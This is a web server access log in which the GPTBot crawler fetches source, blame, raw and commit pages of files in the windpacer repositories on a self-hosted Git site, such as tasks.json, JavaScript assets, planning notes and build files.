"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" +[17/Feb/2026:15:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12289] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" +[17/Feb/2026:15:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12289] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" +[17/Feb/2026:15:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fApp.tsx" [Client 74.7.227.38] [Length 24699] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:15:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2findex.html" [Client 74.7.227.38] [Length 26338] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:15:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" +[17/Feb/2026:15:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15602] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:15:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" +[17/Feb/2026:15:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:15:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 12013] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:15:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11547] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11547] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11517] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:15:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:15:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11089] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:15:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:15:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 15699] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:15:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12219] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13339] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:15:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 15992] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:15:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:15:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:15:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" +[17/Feb/2026:15:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14917] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" +[17/Feb/2026:15:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14888] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" +[17/Feb/2026:15:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" +[17/Feb/2026:15:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:15:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:15:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:15:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:15:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14921] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:15:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43156] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43159] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 12821] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:15:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode" [Client 74.7.227.38] [Length 9783] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:15:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10437] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 